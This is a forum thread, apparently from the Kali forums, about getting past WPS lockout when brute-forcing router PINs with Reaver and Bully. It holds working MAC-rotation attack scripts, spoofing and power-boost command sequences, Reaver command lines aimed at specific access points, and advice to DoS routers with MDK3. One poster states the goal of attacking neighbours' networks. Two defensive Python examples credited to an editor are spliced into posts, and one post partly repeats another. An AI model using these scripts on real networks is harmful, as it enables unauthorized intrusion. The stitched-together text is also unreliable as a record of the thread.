Results 1 to 46 of 46

Thread: Reaver - WPS Locked Situation and Useful Link.

  1. #1
    Join Date
    2013-Dec
    Posts
    5

    Reaver - WPS Locked Situation and Useful Link.

    My impression is that Reaver is becoming increasingly unusable due to the fact that router manufacturers have compensated for its abilities and for those of similar tools like Bully.

    In particular, the problem is one of WPS locking.

    For example:

    [+] Associated with 00:11:22:33:44:55 (ESSID: XXXXXXX)
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

    And so on....

    I check with wash and it tells me the WPS is locked.

    I have tried the -L option which supposedly ignores the locked state.

    [+] Trying pin 000966329
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 00096639
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred

    And so on...

    Two questions:

    1. My impression is that there is no way to overcome a WPS Locked situation. One just has to wait until the WPS becomes unlocked. How long does this take on average? I've waited several hours and wash still says the AP is locked. Is there a specific time limit? Or is it until the router is manually reset?

    2. Are there any alternative tools that people would recommend? I've briefly tried Bully but it still has the same problem which makes sense since the issue is not with Reaver but with the AP itself. Or perhaps a tool that does not crack WPS. I used Pyrit some time ago but was never successful. I also once tried a commercial WPS cracker but that also failed.

    Also - this is an interesting link about the limitations of Reaver in the context of WPS locking: http://sethioz.com/mediawiki/index.p...PA/WPA2/WEP%29

    The author's suggestion is to be ultra-cautious and use -d 300 to prevent WPS locking. This does, of course, mean that any success will take ages.

  2. #2
    Join Date
    2013-Mar
    Location
    sanfrancisco.ca ;
    Posts
    6
    Some routers will just block the mac address after a few failed WPS attempts, so you can bash your way with macchanger -r to some success.

    However, anything new, as you said, tends to lock completely. You have to get fancy with trying to reset it to carry on.

    soxrok2212 started a great thread touching on this: https://forums.kali.org/showthread.p...struction-Mode

  3. #3
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Check out my post (register mentioned it above also). You can use MDK3 to DoS the router, which MAY cause it to reboot and unlock WPS for a little while.

  4. #4
    Join Date
    2013-Jul
    Posts
    844
    If you suspect a router is blocking your WPS pin attempts by comparing pin requests against mac codes, go to the following link and download varmacreaver.sh. This program starts reaver, makes some pin requests, shuts down, changes its mac and restarts. The program is menu driven, so you start it and walk away.

    https://forums.kali.org/showthread.p...-Free-Download


    If you suspect reaver is not working, make sure you have the latest version of kali. Find the thread entitled "handling the 99.99% problem with reaver" in these forums.

    And remember it is not reaver that is the problem. Software engineers are aware of the WPS flaw and are writing programs to close it. Nothing stays the same.

    Follow soxrok2212 as he is leading an effort at present to get around these countermeasures.

    Musket Team Alpha

  5. #5
    Join Date
    2013-Oct
    Location
    Earth
    Posts
    4
    Hi.
    I have several WPS locking APs in my neighbourhood.
    It would be useful to have a script that automates Reaver for a batch attack.
    It could look like this:

    reaver attack AP_1
    if `Detected AP rate limiting`
    save session
    reaver attack AP_2
    if `Detected AP rate limiting`
    save session
    reaver attack AP_xy...
    sleep for x seconds
    here we go again

    Of course, many things can go wrong with Reaver, but it would be interesting to test it.

    I'm sure someone in this vast community can code such a timesaver.

  6. #6
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by slobodanM View Post
    It would be useful to have a script that automates Reaver for a batch attack.
    I'm sure someone in this vast community can code such a timesaver.
    Musket Team Alpha and I are working on this, though as of right now, it is not fully automated. The script attacks an AP BUT the user has to input when they think/know the router reset. We are working on making this project public soon.

  7. #7
    Join Date
    2013-Jun
    Posts
    125

    AP rate limiting is not affected by changing mac address when attempting pins

    Quote Originally Posted by bad_bobby View Post
    My impression is that Reaver is becoming increasingly unusable due to the fact that router manufacturers have compensated for its abilities and for those of similar tools like Bully.

    In particular, the problem is one of WPS locking.

    For example:

    [+] Associated with 00:11:22:33:44:55 (ESSID: XXXXXXX)
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

    And so on....

    I check with wash and it tells me the WPS is locked.

    I have tried the -L option which supposedly ignores the locked state.

    [+] Trying pin 000966329
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 00096639
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred

    And so on...

    Two questions:

    1. My impression is that there is no way to overcome a WPS Locked situation. One just has to wait until the WPS becomes unlocked. How long does this take on average? I've waited several hours and wash still says the AP is locked. Is there a specific time limit? Or is it until the router is manually reset?

    2. Are there any alternative tools that people would recommend? I've briefly tried Bully but it still has the same problem which makes sense since the issue is not with Reaver but with the AP itself. Or perhaps a tool that does not crack WPS. I used Pyrit some time ago but was never successful. I also once tried a commercial WPS cracker but that also failed.

    Also - this is an interesting link about the limitations of Reaver in the context of WPS locking: http://sethioz.com/mediawiki/index.p...PA/WPA2/WEP%29

    The author's suggestion is to be ultra-cautious and use -d 300 to prevent WPS locking. This does, of course, mean that any success will take ages.



    Your impression is true. The companies that produced these new routers realised the WPS flaw. As a result they have tightened up their controls on WPS security, and this includes the AP rate limiting feature. I tried using the following script:

    #!/bin/bash
    #Changing Mac Address to random Mac Address
    while :; do echo
    echo "Changing Mac Address to random Mac Address..";
    ifconfig mon0 down;
    ifconfig mon0 down;
    ifconfig wlan2 down;
    ifconfig wlan2 down;
    macchanger -r mon0;
    macchanger -r wlan2;
    ifconfig mon0 up;
    ifconfig mon0 up;
    ifconfig wlan2 up;
    ifconfig wlan2 up;
    echo "Mac Address Changed and interface is up!"
    #running reaver 1.4
    echo "running reaver 1.4"
    echo y|reaver -i mon0 -b C87:19:89:E7:13 -c1 -vv -t 20 -n -d10 -g1 -L;
    sleep 1
    done

    WHAT THE SCRIPT WAS DOING
    1. changes my interface's mac address
    2. runs the reaver program, which will try one key and terminate itself
    3. changes my mac address and then tries reaver with one key again
    THIS PROCESS GOES ON INFINITELY unless manually stopped.

    OBSERVATION
    reaver still indicates that the APs are rate limiting pin attempts. The wash tool also indicates WPS "yes" (locked) for the APs. I am now convinced that these new routers are not rate limiting pins due to one device mac consistently trying pins.

    Other Alternatives
    Pyrit is a wonderful tool if used with a graphics card and crunch to do a brute force attack. However, trying ALL the possible PERMUTATIONS (NOT COMBINATIONS) of alphanumeric characters for a 9 digit password (A-Z, a-z, 0-9) will take over a decade. Hopefully, if you use a dictionary, you might need to pray that the password is in it...

  8. #8
    Join Date
    2013-Jun
    Posts
    125

    Access points validate both halves of the pin at once

    It appears that new routers/access points are not validating the first half of the pin FIRST and AFTERWARDS the second half of the pin. When reaver tried the first pin "1234" it automatically brute-forced the second half of the pin, since reaver assumes that the access point confirmed that the first half of the pin is true because the AP requested a message 5 for the second half of the pin. I have tried the new tool "bully" and it sticks at the first pin it tried. Using wireshark I observed the WPS messages sent, that is, my adapter sends a message 4 and waits for the response to see if the AP will send a WSC NACK or a message 5 (for the second half of the pin). If the AP sends a message 5, reaver assumes that the first half of the pin is correct and brute-forces the second half of the pin, but this does not mean that the first half of the pin is correct; I am sure this means that the AP is requesting the first half of the pin and then the second half of the pin and then determining whether the complete pin is correct or not!!! Is there any tool that can try all pin combinations without checking to see if the first half of the pin is correct or not? I will appreciate everyone brainstorming/ideas on this... thank you.

  9. #9
    Join Date
    2014-Jan
    Posts
    12
    There's a modified version of reaver called ryreaver-reverse, but I can't make it work in kali debian; it only works in backtrack 5rc3 ubuntu.


    "and commands are same as normal reaver. as explained this one worked on a station where normal reaver failed. normal reaver got first part of the WPS pin, but failed to get last 3 digits + checksum (last 4 digits in total), but this one did it!"

    http://sethioz.com/forum/viewtopic.php?p=9757

    Hope someone can figure out how to make it work in kali. Does it have to be compiled for debian?
    Last edited by fonzy35; 2014-03-19 at 11:43.

  10. #10
    Join Date
    2013-Jul
    Posts
    844
    To: repzeroworld

    Our Team wishes to point out that the series of commands you are using to spoof a mac when using reaver will not work. You can test this easily enough. Just start a reaver attack after trying to spoof a mac your way. Next open up airodump-ng on the channel -c and bssid -b of your target and look to see exactly what mac is being produced.

    You are doing two (2) things wrong:

    1. You must add the spoofed mac address to the reaver command line. see reaver help files.

    2. Prior to running reaver you must run the following

    ifconfig wlan0 down
    ifconfig wlan0 hw ether 00:11:22:33:44:55
    iw reg set BO # optional to boost power FOR awuso36h
    ifconfig wlan0 up
    iwconfig wlan0 channel 13 # optional to boost power FOR awuso36h
    iwconfig wlan0 txpower 30 # optional to boost power FOR awuso36h
    iwconfig wlan0 rate 1M # optional to boost power FOR awuso36h
    airmon-ng start wlan0
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:55 mon0
    ifconfig mon0 up

    MTA

  11. #11
    Join Date
    2013-Jul
    Posts
    844
    To: repzeroworld


    One thing we forgot to mention!!!

    The mac you spoof with the series of commands we gave you MUST be the same mac that is seen in the reaver command line.

    See example listed below:

    reaver -i mon0 -a -f -c 1 -b 55:44:33:22:11:00 -vv -x 60 --mac=00:11:22:33:44:55

  12. #12
    Quote Originally Posted by fonzy35 View Post
    There's a modified version of reaver called ryreaver-reverse, but I can't make it work in kali debian; it only works in backtrack 5rc3 ubuntu.


    "and commands are same as normal reaver. as explained this one worked on a station where normal reaver failed. normal reaver got first part of the WPS pin, but failed to get last 3 digits + checksum (last 4 digits in total), but this one did it!"

    http://sethioz.com/forum/viewtopic.php?p=9757

    Hope someone can figure out how to make it work in kali. Does it have to be compiled for debian?
    I did get this to work in kali (can't remember how now as I'm doing a rebuild) - but it is a bit quirky - it does not at this time save/restart a session; it is solely used to trap the last 3 digits + checksum.

    What that means I guess is that if you have the first 4 digits of the pin and reaver can't find the last then run the first 4 through ryreaver-reverse and see
    if it will catch the last 4.

    I contacted sethioz on the forum concerning the save/restart issue and he informed me that the guy who rewrote reaver for this eventuality is away for
    several months on holiday, but hopefully, when he comes back he may be able to resolve the issues.

    Rab.

  13. #13
    Join Date
    2014-Jan
    Posts
    12
    Quote Originally Posted by flyinghaggis View Post
    I did get this to work in kali (can't remember how now as I'm doing a rebuild) - but it is a bit quirky - it does not at this time save/restart a session; it is solely used to trap the last 3 digits + checksum.

    What that means I guess is that if you have the first 4 digits of the pin and reaver can't find the last then run the first 4 through ryreaver-reverse and see
    if it will catch the last 4.

    I contacted sethioz on the forum concerning the save/restart issue and he informed me that the guy who rewrote reaver for this eventuality is away for
    several months on holiday, but hopefully, when he comes back he may be able to resolve the issues.

    Rab.
    Thanks for the reply flyinghaggis, if you remember how you did manage to make it work in kali, let me know. It would be very appreciated.

    TIA

  14. #14
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by mmusket33 View Post
    To: repzeroworld

    Our Team wishes to point out that the series of commands you are using to spoof a mac when using reaver will not work. You can test this easily enough. Just start a reaver attack after trying to spoof a mac your way. Next open up airodump-ng on the channel -c and bssid -b of your target and look to see exactly what mac is being produced.

    You are doing two (2) things wrong:

    1. You must add the spoofed mac address to the reaver command line. see reaver help files.

    2. Prior to running reaver you must run the following

    ifconfig wlan0 down
    ifconfig wlan0 hw ether 00:11:22:33:44:55
    iw reg set BO # optional to boost power FOR awuso36h
    ifconfig wlan0 up
    iwconfig wlan0 channel 13 # optional to boost power FOR awuso36h
    iwconfig wlan0 txpower 30 # optional to boost power FOR awuso36h
    iwconfig wlan0 rate 1M # optional to boost power FOR awuso36h
    airmon-ng start wlan0
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:55 mon0
    ifconfig mon0 up

    MTA
    I have been spoofing my mac address using this method to bypass mac filtering mechanisms of open hotspots and it worked! Additionally I have used wireshark and airodump to verify that my interface mac address is the spoofed mac address! Probably you can check out the Backtrack 5 Wireless Penetration Testing book by Vivek to verify this as well. The only problem with my script is that I should not have randomly spoofed the mac address of wlan1, since wlan1 is down and not 'apparently' in use. I AM NOT SAYING THAT YOUR METHOD IS INCORRECT, BUT THERE ISN'T ONLY ONE WAY IN LINUX TO DO THINGS!

    As further evidence i have spoofed my mac to reflect 2e:be:88:ac:97:3e!


    root@localhost:~# ifconfig mon0 down
    root@localhost:~# macchanger -m 2e:be:88:ac:97:3e mon0
    Permanent MAC: 00:c0:ca:6d:ac:fa (Alfa, Inc.)
    Current MAC: 88:cc:b5:c4:6d:aa (unknown)
    New MAC: 2e:be:88:ac:97:3e (unknown)


    airodump-ng shows my spoof mac is associated with access point!

    CH 6 ][ Elapsed: 51 s ][ 2014-03-22 10:35

    BSSID              PWR RXQ Beacons #Data, #/s CH MB  ENC  CIPHER AUTH ESSID

    9C:D3:6D:B0:1A:A2  -83  72     303     29   0  6 54e WPA2 CCMP   PSK  NETGEAR23omar

    BSSID              STATION            PWR  Rate   Lost Frames Probe

    9C:D3:6D:B0:1A:A2  2E:BE:88:AC:97:3E    0  1 - 1     0    106



    Wireshark shows that packets sent are using my spoofed mac 2e:be:88:ac:97:3e when reaver is in use!

    2028 13.061631000 2e:be:88:ac:97:3e Netgear_b0:1a:a2 EAP 84 Response, Identity
    2029 13.064236000 Netgear_b0:1a:a2 2e:be:88:ac:97:3e EAP 71 Request, Identity
    2350 15.029302000 Netgear_b0:1a:a2 2e:be:88:ac:97:3e EAP 472 Request, Expanded Type, WPS, M1




    IEEE 802.11 protocol in wireshark shows the Receiver address and Destination address are my spoofed mac!
    This extract from wireshark is below:

    IEEE 802.11 Data, Flags: ....R.F.C

    Receiver address: 2e:be:88:ac:97:3e (2e:be:88:ac:97:3e)
    Destination address: 2e:be:88:ac:97:3e (2e:be:88:ac:97:3e)
    Transmitter address: Netgear_b0:1a:a2 (9c:d3:6d:b0:1a:a2)
    BSS Id: Netgear_b0:1a:a2 (9c:d3:6d:b0:1a:a2)
    Source address: Netgear_b0:1a:a2 (9c:d3:6d:b0:1a:a2)
    Last edited by repzeroworld; 2014-03-22 at 14:50.
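
    The airodump-ng and wireshark extracts above show what one WPS registration attempt looks like on the air: the AP answers each new enrollee with an EAP "WPS, M1" request. The following Python script is an editor's added example, not code from this thread or from reaver, bully or any router firmware. It reads wireshark packet-list lines in the same layout as the extract in this post and flags an access point that hands out M1 messages to many stations in a short window, which is how a PIN brute-force with rotating client MACs looks from the defender's side, where a per-MAC counter would see nothing unusual. The log lines, the locally administered station MACs, the 60 second window and the threshold of 5 are constructed values.

```python
import re
from collections import defaultdict

# Constructed sample in the format of a wireshark packet-list export:
# frame  time  source  destination  protocol  length  info
SAMPLE_LOG = """\
2028 13.061631000 02:00:00:00:00:01 Netgear_b0:1a:a2 EAP 84 Response, Identity
2029 13.064236000 Netgear_b0:1a:a2 02:00:00:00:00:01 EAP 71 Request, Identity
2350 15.029302000 Netgear_b0:1a:a2 02:00:00:00:00:01 EAP 472 Request, Expanded Type, WPS, M1
2351 15.100000000 02:00:00:00:00:01 Netgear_b0:1a:a2 EAP 500 Response, Expanded Type, WPS, M2
2360 15.400000000 Netgear_b0:1a:a2 02:00:00:00:00:01 EAP 120 Request, Expanded Type, WPS, M3
2400 21.500000000 Netgear_b0:1a:a2 02:00:00:00:00:01 EAP 472 Request, Expanded Type, WPS, M1
2500 28.000000000 Netgear_b0:1a:a2 02:00:00:00:00:02 EAP 472 Request, Expanded Type, WPS, M1
2600 30.000000000 Linksys_aa:bb:cc 02:00:00:00:00:09 EAP 472 Request, Expanded Type, WPS, M1
2650 33.900000000 Netgear_b0:1a:a2 02:00:00:00:00:02 EAP 472 Request, Expanded Type, WPS, M1
2700 40.200000000 Netgear_b0:1a:a2 02:00:00:00:00:03 EAP 472 Request, Expanded Type, WPS, M1
2800 47.700000000 Netgear_b0:1a:a2 02:00:00:00:00:04 EAP 472 Request, Expanded Type, WPS, M1
"""

LINE_RE = re.compile(
    r"^(?P<frame>\d+)\s+(?P<time>[\d.]+)\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+"
    r"(?P<proto>\S+)\s+(?P<length>\d+)\s+(?P<info>.*)$"
)


def parse_line(line):
    """Split one packet-list line into its columns; None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = float(rec["time"])
    return rec


def wps_m1_events(lines):
    """Yield (time, ap, station) for every WPS M1 an AP sends.

    M1 is the first registrar message of a WPS exchange, so each one marks
    the start of a fresh registration attempt against that AP."""
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["proto"] != "EAP":
            continue
        if "WPS" in rec["info"] and re.search(r"\bM1\b", rec["info"]):
            yield rec["time"], rec["src"], rec["dst"]


def find_wps_bruteforce(lines, window=60.0, threshold=5):
    """Return {ap: summary} for every AP that started at least `threshold`
    WPS exchanges inside any `window` second span, regardless of which
    client MAC each exchange came from."""
    per_ap = defaultdict(list)
    for t, ap, sta in wps_m1_events(lines):
        per_ap[ap].append((t, sta))

    alerts = {}
    for ap, events in per_ap.items():
        events.sort()
        best = None                      # (count, left index, right index)
        left = 0
        for right in range(len(events)):  # sliding window over sorted times
            while events[right][0] - events[left][0] > window:
                left += 1
            count = right - left + 1
            if best is None or count > best[0]:
                best = (count, left, right)
        count, left, right = best
        if count >= threshold:
            span = events[left:right + 1]
            alerts[ap] = {
                "m1_count": count,
                "stations": sorted({sta for _, sta in span}),
                "first_time": span[0][0],
                "last_time": span[-1][0],
            }
    return alerts


if __name__ == "__main__":
    for ap, info in find_wps_bruteforce(SAMPLE_LOG.splitlines()).items():
        print("possible WPS PIN brute-force against %s: %d M1 in %.1fs from %d stations"
              % (ap, info["m1_count"], info["last_time"] - info["first_time"],
                 len(info["stations"])))
```

    Keying the counter on the AP rather than on the station is the whole point: in the sample, no single client sends more than two registration attempts, so a per-client view stays quiet, while the AP-level view sees six exchanges from four different MACs inside 33 seconds. The same idea applies to a wireless IDS fed from a monitor-mode capture or to an AP's own registrar log.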

  15. #15
    Join Date
    2013-Jun
    Posts
    125
    ..........
    Last edited by repzeroworld; 2014-03-22 at 15:18.

  16. #16
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by fonzy35 View Post
    Thanks for the reply flyinghaggis, if you remember how you did manage to make it work in kali, let me know. It would be very appreciated.

    TIA
    To: flyinghaggis
    Thanks for expressing your idea, I appreciate this. I will try this tool. However, I am using the new wps cracking tool known as 'bully'; it works amazingly well. It is built using C programming and it has the option of brute-forcing the last digit/checksum digit. It tries ALL possible PERMUTATIONS of the last 4 digits of the wps pin! The only problem that I have with this tool is that it does not show detailed messages as shown in reaver (with a -vv flag). Other than that this program works well!

  17. #17
    Join Date
    2013-Jul
    Posts
    844
    To Repzeroworld

    When mac spoofing sites like hotspots etc. you are correct. We use the exact same commands you are using. However, with reaver you need to use the series of commands and additions to the reaver command line or reaver will not function correctly. For second, third and fourth opinions on this we suggest you go to the WPS-Reaver site in google and work through the help files. This problem is explored in depth there. This is a common error with reaver users. We made the same mistake a few years ago.

  18. #18
    Join Date
    2013-Jun
    Posts
    125

    Thank you MMUSKET33.

    Quote Originally Posted by mmusket33 View Post
    To Repzeroworld

    When mac spoofing sites like hotspots etc. you are correct. We use the exact same commands you are using. However, with reaver you need to use the series of commands and additions to the reaver command line or reaver will not function correctly. For second, third and fourth opinions on this we suggest you go to the WPS-Reaver site in google and work through the help files. This problem is explored in depth there. This is a common error with reaver users. We made the same mistake a few years ago.


    TO: MMUSKET 33


    Thank you for bringing this to my attention!
    I made my script without focusing on this small piece of information in the mac spoofing area of the reaver help section. The reaver program behaves somewhat differently, I suppose.

    A BETTER UNDERSTANDING WHY REAVER BEHAVES DIFFERENTLY WHEN ONLY THE VIRTUAL INTERFACE MAC ADDRESS IS CHANGED

    I observed that my script ran the reaver program "ok", meaning that it "SOMETIMES" successfully attempted pins. However, frequently the reaver program gets stuck at "Sending identity response". I believe that changing the virtual interface of mon0 SOMETIMES affects the "diffie-hellman" secret numbers process which takes place at message 1 and 2 to agree on a common open shared key before requesting the first pin. A couple of access points refused to send message 1 because of this. Nevertheless, instead of using the ifconfig utility to change my physical mac, I have used the macchanger utility to change my physical interface and my virtual interface which reaver uses. I ran reaver without using the -m flag (since I have already used macchanger to change my mac instead of giving reaver this option) and it successfully completed that diffie-hellman stage (message 1 and 2)!


    REVISED SCRIPT
    I have modified my script to change my physical and virtual interface to specific defined mac addresses.

    My script is now a little lengthy and it changes my mac address once after a pin is tried, for 11 times, and after that the script restarts itself (I am still reading a book on bash scripting, so I suppose once I finish this book I will find a way to reduce this script's length).


    YOUR OPINION

    What is your opinion on the new measures enacted for wps security? I have tried my revised script and it seems that changing my mac address at every pin attempt has no effect on the new cisco routers! These routers exponentially relate pin attempts with their wps locking feature. I observed that the more bad pin attempts are tried, the longer the router locks up! Also I am assessing another router that requests both halves of the pin at once, which makes reaver believe that a message 5 received means that the first half of the pin is correct!
    I did some searching on the web and found that this is a new measure for the wps 2.0 version. Seems like this sweet little program, reaver, was taken seriously..haha..


    However, my revised script is below:
    #!/bin/bash
    #Changing Mac Address to random Mac Address
    while :; do echo
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m 88:51:e4:b8:d6:51 mon0;
    printf "changing mac address of wlan1 interface\n";
    sleep 3;
    macchanger -m 88:51:e4:b8:d6:51 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4\n";
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #SECOND TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m 3a:d8:5a:9e:d2:f7 mon0;
    printf "changing mac address of wlan1 interface\n";
    macchanger -m 3a:d8:5a:9e:d2:f7 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4\n";
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #THIRD TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m aa:6d:9b:58:f0:83 mon0;
    printf "changing mac address of wlan1 interface\n";
    macchanger -m aa:6d:9b:58:f0:83 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4\n";
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #FOURTH TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m 9a:92:2f:79:69:f1 mon0;
    printf "changing mac address of wlan1 interface\n";
    macchanger -m 9a:92:2f:79:69:f1 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4\n";
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #FIFTH TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    printf "changing mac address of wlan1 interface\n";
    sleep 3;
    ### THIS PROCESS GOES ON UNTIL 11 ATTEMPTS AND THEN RESTARTS
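
    Posts #2, #7 and this one report the same thing from the attacker's side: rotating the client mac helps against APs that lock per client and does nothing against APs that lock the WPS registrar as a whole, with the lock growing longer after every further failure. The Python model below is an editor's added example, not code from this thread or from any router firmware; it makes that difference concrete with one lockout policy class that can be scoped per station or per AP and backs off exponentially, plus a simulation of wrong-PIN attempts with and without mac rotation. The failure threshold, timings and the locally administered client MACs are constructed assumptions, chosen to illustrate the design choice rather than to describe any particular product.

```python
from collections import defaultdict


class WpsLockoutPolicy:
    """Model of an AP's WPS lockout.

    scope="station" locks only the offending client MAC; scope="ap" locks the
    registrar for every client. After `threshold` consecutive failures the lock
    lasts base_lock seconds and grows by `factor` with each further failure,
    capped at max_lock (all values are constructed for the example)."""

    def __init__(self, scope="ap", threshold=3, base_lock=60.0,
                 factor=2.0, max_lock=3600.0):
        if scope not in ("ap", "station"):
            raise ValueError("scope must be 'ap' or 'station'")
        self.scope = scope
        self.threshold = threshold
        self.base_lock = base_lock
        self.factor = factor
        self.max_lock = max_lock
        self.failures = defaultdict(int)      # key -> consecutive failures
        self.locked_until = defaultdict(float)  # key -> absolute unlock time

    def _key(self, station):
        # A per-AP lock ignores who the client is; a per-station lock does not.
        return "*" if self.scope == "ap" else station

    def is_locked(self, station, now):
        return self.locked_until[self._key(station)] > now

    def lock_duration(self, n_failures):
        """Seconds to lock after the n-th consecutive failure (0 below threshold)."""
        if n_failures < self.threshold:
            return 0.0
        return min(self.max_lock,
                   self.base_lock * self.factor ** (n_failures - self.threshold))

    def record_failure(self, station, now):
        key = self._key(station)
        self.failures[key] += 1
        duration = self.lock_duration(self.failures[key])
        if duration > 0:
            self.locked_until[key] = now + duration
        return duration

    def record_success(self, station):
        key = self._key(station)
        self.failures[key] = 0
        self.locked_until[key] = 0.0


def simulate_bad_pins(policy, attempts=20, interval=10.0, rotate_mac=False):
    """Send `attempts` wrong PINs `interval` seconds apart, optionally from a
    fresh (constructed, locally administered) client MAC each time.
    Returns (attempts the AP processed, attempts refused while locked)."""
    accepted = refused = 0
    for i in range(attempts):
        now = i * interval
        station = "02:00:00:00:00:%02x" % i if rotate_mac else "02:00:00:00:00:01"
        if policy.is_locked(station, now):
            refused += 1
            continue
        accepted += 1
        policy.record_failure(station, now)
    return accepted, refused


if __name__ == "__main__":
    for scope in ("station", "ap"):
        for rotate in (False, True):
            got = simulate_bad_pins(WpsLockoutPolicy(scope=scope), rotate_mac=rotate)
            print("scope=%-7s rotate_mac=%-5s processed=%2d refused=%2d" % ((scope, rotate) + got))
```

    With the constructed parameters a per-station policy processes all 20 rotated attempts, while a per-AP policy processes only 4 of them in the same period whether the client mac changes or not, and the fourth attempt already buys a 120 second lock. That is the behaviour described in this post for the newer routers, and it is the reason a registrar-wide lock with growing duration is the stronger design, at the cost of letting any nearby station deny WPS enrolment to everyone.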

  19. #19
    Join Date
    2013-Jun
    Posts
    125

    Thank you MMUSKET33.

    Quote Originally Posted by mmusket33 View Post
    To Repzeroworld

    When mac spoofing sites like hotspots etc you are correct. We use the exact same commands you are using. However with reaver you need to use the series of commands and addittions to the reaver command line or reaver will not function correctly. For second,third and fourth opinions on this we suggest you go to the WPS-Reaver site in google and work thru the help files. This problem is explored in depth there. This is a common error with reaver users. We made the same mistake a few years ago.


    TO: MMUSKET 33


    Thank you for bringing this to my attention!
    I have made my script without focusing on a small this piece of information in the mac spoofing area in the reaver help section.The reaver program is behaves somewhat
    different i suppose

    A BETTER UNDERSTANDING WHY REAVER BEHAVES DIFFRENTLY WHEN ONLY VIRTUAL MAC ADDRESS INTERFACE IS CHANGED

    I observed that my script ran the reaver program "ok" meaning that it " SOMETIMES" sucessfully attempted pins. however, frequently
    the reaver program get stuck at the "Sending identity response", I believe that changing the virtual interface of mon0 SOMETIMES affects "diffie-hellman" secret numbers
    process which takes place at message 1 and 2 to agree on a common opened shared key before requesting the first pin. A couple of Access points
    refused to send message 1 because of this.....Nevertheless instead of using the ifconfig utility to change my physical mac. I
    have used the macchanger utility to change my physical interface and my virtual interface which reaver use.
